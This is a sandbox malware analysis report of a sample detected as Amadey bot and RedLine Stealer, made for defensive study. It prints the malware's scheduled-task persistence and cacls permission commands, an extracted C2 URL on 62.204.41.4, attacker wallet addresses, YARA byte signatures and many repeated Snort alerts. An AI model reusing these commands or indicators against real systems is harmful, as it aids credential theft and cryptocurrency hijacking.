Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:800795
MD5:b16d53f153404f5825765f11ab2b6827
SHA1:cc5d6001624f836f5aa82e0178c6c2dc2fdac2c4
SHA256:128da440dc3448874960fb1eb8d34c283ba78f6517e20b57f2faa158d84a3fd0
Tags:exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Amadeys Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 4604 cmdline: C:\Users\user\Desktop\file.exe MD5: B16D53F153404F5825765F11AB2B6827)
    • bKug.exe (PID: 2188 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe MD5: E2A785D0666AFD7BBE63FAF32216A8AA)
      • aKuf.exe (PID: 4916 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe MD5: CCFC1E2539F9382400217DF5AE6D1D8A)
      • nika.exe (PID: 5316 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 3096 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 2328 cmdline: "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 4484 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5076 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4512 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 5860 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 5856 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 3484 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 3236 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 3580 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 4716 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 4724 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5352 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 4760 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 4500 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 3808 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 1104 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            SourceRuleDescriptionAuthorStrings
            00000007.00000000.365076498.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000012.00000002.375060444.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000012.00000000.369836464.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0000001D.00000002.755532601.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
                    • 0x1718:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
                    Click to see the 20 entries
                    SourceRuleDescriptionAuthorStrings
                    2.2.aKuf.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      2.2.aKuf.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                      • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                      • 0x1e9d0:$s5: delete[]
                      • 0x1de88:$s6: constructor or from DllMain.
                      6.2.xriv.exe.8c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        27.2.mnolyk.exe.ad0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          7.0.mnolyk.exe.ad0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            Click to see the 18 entries
                            No Sigma rule has matched
                            Timestamp:192.168.2.562.204.41.449780802027700 02/07/23-19:57:25.243032
                            SID:2027700
                            Source Port:49780
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450240802027700 02/07/23-19:59:33.419821
                            SID:2027700
                            Source Port:50240
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449814802027700 02/07/23-19:57:35.140362
                            SID:2027700
                            Source Port:49814
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449912802027700 02/07/23-19:58:02.026161
                            SID:2027700
                            Source Port:49912
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449909802027700 02/07/23-19:58:01.309254
                            SID:2027700
                            Source Port:49909
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450237802027700 02/07/23-19:59:32.701921
                            SID:2027700
                            Source Port:50237
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450433802027700 02/07/23-20:00:26.461663
                            SID:2027700
                            Source Port:50433
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450139802027700 02/07/23-19:59:06.422233
                            SID:2027700
                            Source Port:50139
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450209802027700 02/07/23-19:59:25.926205
                            SID:2027700
                            Source Port:50209
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450335802027700 02/07/23-19:59:58.469497
                            SID:2027700
                            Source Port:50335
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450175802027700 02/07/23-19:59:15.074931
                            SID:2027700
                            Source Port:50175
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450307802027700 02/07/23-19:59:51.711604
                            SID:2027700
                            Source Port:50307
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449847802027700 02/07/23-19:57:43.302254
                            SID:2027700
                            Source Port:49847
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449749802027700 02/07/23-19:57:17.867893
                            SID:2027700
                            Source Port:49749
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450466802027700 02/07/23-20:00:34.175411
                            SID:2027700
                            Source Port:50466
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450016802027700 02/07/23-19:58:31.545050
                            SID:2027700
                            Source Port:50016
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450114802027700 02/07/23-19:58:57.604605
                            SID:2027700
                            Source Port:50114
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450212802027700 02/07/23-19:59:26.656555
                            SID:2027700
                            Source Port:50212
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450368802027700 02/07/23-20:00:08.721533
                            SID:2027700
                            Source Port:50368
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450273802027700 02/07/23-19:59:41.686869
                            SID:2027700
                            Source Port:50273
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450371802027700 02/07/23-20:00:09.426162
                            SID:2027700
                            Source Port:50371
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450077802027700 02/07/23-19:58:48.624595
                            SID:2027700
                            Source Port:50077
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450170802027700 02/07/23-19:59:13.888323
                            SID:2027700
                            Source Port:50170
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450310802027700 02/07/23-19:59:52.435304
                            SID:2027700
                            Source Port:50310
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449945802027700 02/07/23-19:58:12.060541
                            SID:2027700
                            Source Port:49945
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450458802027700 02/07/23-20:00:32.245201
                            SID:2027700
                            Source Port:50458
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449839802027700 02/07/23-19:57:41.005570
                            SID:2027700
                            Source Port:49839
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450167802027700 02/07/23-19:59:13.182938
                            SID:2027700
                            Source Port:50167
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450072802027700 02/07/23-19:58:47.386919
                            SID:2027700
                            Source Port:50072
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450049802027700 02/07/23-19:58:39.386685
                            SID:2027700
                            Source Port:50049
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450008802027700 02/07/23-19:58:29.531823
                            SID:2027700
                            Source Port:50008
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450204802027700 02/07/23-19:59:22.348680
                            SID:2027700
                            Source Port:50204
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450400802027700 02/07/23-20:00:16.471395
                            SID:2027700
                            Source Port:50400
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449744802027700 02/07/23-19:57:16.664080
                            SID:2027700
                            Source Port:49744
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449940802027700 02/07/23-19:58:10.825829
                            SID:2027700
                            Source Port:49940
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449998802027700 02/07/23-19:58:27.044687
                            SID:2027700
                            Source Port:49998
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449822802027700 02/07/23-19:57:36.840230
                            SID:2027700
                            Source Port:49822
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450150802027700 02/07/23-19:59:09.040992
                            SID:2027700
                            Source Port:50150
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450363802027700 02/07/23-20:00:07.542076
                            SID:2027700
                            Source Port:50363
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450080802027700 02/07/23-19:58:49.338343
                            SID:2027700
                            Source Port:50080
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450405802027700 02/07/23-20:00:17.657437
                            SID:2027700
                            Source Port:50405
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450441802027700 02/07/23-20:00:28.375723
                            SID:2027700
                            Source Port:50441
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449870802027700 02/07/23-19:57:52.051772
                            SID:2027700
                            Source Port:49870
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450044802027700 02/07/23-19:58:38.182720
                            SID:2027700
                            Source Port:50044
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449917802027700 02/07/23-19:58:03.280189
                            SID:2027700
                            Source Port:49917
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450245802027700 02/07/23-19:59:34.591841
                            SID:2027700
                            Source Port:50245
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449875802027700 02/07/23-19:57:53.010907
                            SID:2027700
                            Source Port:49875
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450298802027700 02/07/23-19:59:49.514228
                            SID:2027700
                            Source Port:50298
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449757802027700 02/07/23-19:57:19.196421
                            SID:2027700
                            Source Port:49757
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450024802027700 02/07/23-19:58:33.541536
                            SID:2027700
                            Source Port:50024
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450315802027700 02/07/23-19:59:53.640304
                            SID:2027700
                            Source Port:50315
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450085802027700 02/07/23-19:58:50.542002
                            SID:2027700
                            Source Port:50085
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450413802027700 02/07/23-20:00:19.937795
                            SID:2027700
                            Source Port:50413
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449867802027700 02/07/23-19:57:51.323673
                            SID:2027700
                            Source Port:49867
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450195802027700 02/07/23-19:59:19.673213
                            SID:2027700
                            Source Port:50195
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449711802027700 02/07/23-19:57:09.336516
                            SID:2027700
                            Source Port:49711
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449895802027700 02/07/23-19:57:57.922450
                            SID:2027700
                            Source Port:49895
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449965802027700 02/07/23-19:58:16.796475
                            SID:2027700
                            Source Port:49965
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450293802027700 02/07/23-19:59:48.325220
                            SID:2027700
                            Source Port:50293
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450122802027700 02/07/23-19:58:59.516632
                            SID:2027700
                            Source Port:50122
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450278802027700 02/07/23-19:59:44.686906
                            SID:2027700
                            Source Port:50278
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450376802027700 02/07/23-20:00:10.676242
                            SID:2027700
                            Source Port:50376
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450232802027700 02/07/23-19:59:31.467525
                            SID:2027700
                            Source Port:50232
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449729802027700 02/07/23-19:57:13.008119
                            SID:2027700
                            Source Port:49729
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449981802027700 02/07/23-19:58:20.676823
                            SID:2027700
                            Source Port:49981
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450330802027700 02/07/23-19:59:57.254968
                            SID:2027700
                            Source Port:50330
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450229802027700 02/07/23-19:59:30.761202
                            SID:2027700
                            Source Port:50229
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450057802027700 02/07/23-19:58:41.341646
                            SID:2027700
                            Source Port:50057
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449904802027700 02/07/23-19:58:00.083813
                            SID:2027700
                            Source Port:49904
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449732802027700 02/07/23-19:57:13.710639
                            SID:2027700
                            Source Port:49732
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449830802027700 02/07/23-19:57:38.830731
                            SID:2027700
                            Source Port:49830
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449986802027700 02/07/23-19:58:21.857184
                            SID:2027700
                            Source Port:49986
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450265802027700 02/07/23-19:59:39.451988
                            SID:2027700
                            Source Port:50265
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449937802027700 02/07/23-19:58:10.104815
                            SID:2027700
                            Source Port:49937
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449862802027700 02/07/23-19:57:50.104682
                            SID:2027700
                            Source Port:49862
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450302802027700 02/07/23-19:59:50.470972
                            SID:2027700
                            Source Port:50302
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450060802027700 02/07/23-19:58:42.295231
                            SID:2027700
                            Source Port:50060
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450190802027700 02/07/23-19:59:18.716317
                            SID:2027700
                            Source Port:50190
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449978802027700 02/07/23-19:58:19.951026
                            SID:2027700
                            Source Port:49978
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449724802027700 02/07/23-19:57:11.745483
                            SID:2027700
                            Source Port:49724
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450011802027700 02/07/23-19:58:30.290364
                            SID:2027700
                            Source Port:50011
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450224802027700 02/07/23-19:59:29.577696
                            SID:2027700
                            Source Port:50224
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450052802027700 02/07/23-19:58:40.105001
                            SID:2027700
                            Source Port:50052
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450348802027700 02/07/23-20:00:03.954544
                            SID:2027700
                            Source Port:50348
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450159802027700 02/07/23-19:59:11.230109
                            SID:2027700
                            Source Port:50159
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450384802027700 02/07/23-20:00:12.627471
                            SID:2027700
                            Source Port:50384
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449765802027700 02/07/23-19:57:20.854177
                            SID:2027700
                            Source Port:49765
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450029802027700 02/07/23-19:58:34.809953
                            SID:2027700
                            Source Port:50029
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450130802027700 02/07/23-19:59:01.720565
                            SID:2027700
                            Source Port:50130
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450343802027700 02/07/23-20:00:00.779938
                            SID:2027700
                            Source Port:50343
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450421802027700 02/07/23-20:00:23.597298
                            SID:2027700
                            Source Port:50421
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450260802027700 02/07/23-19:59:38.219727
                            SID:2027700
                            Source Port:50260
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449932802027700 02/07/23-19:58:09.150327
                            SID:2027700
                            Source Port:49932
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449890802027700 02/07/23-19:57:56.718243
                            SID:2027700
                            Source Port:49890
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449802802027700 02/07/23-19:57:32.212401
                            SID:2027700
                            Source Port:49802
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449760802027700 02/07/23-19:57:19.749026
                            SID:2027700
                            Source Port:49760
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449973802027700 02/07/23-19:58:18.734052
                            SID:2027700
                            Source Port:49973
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449728802027700 02/07/23-19:57:12.773087
                            SID:2027700
                            Source Port:49728
                            Destination Port:80
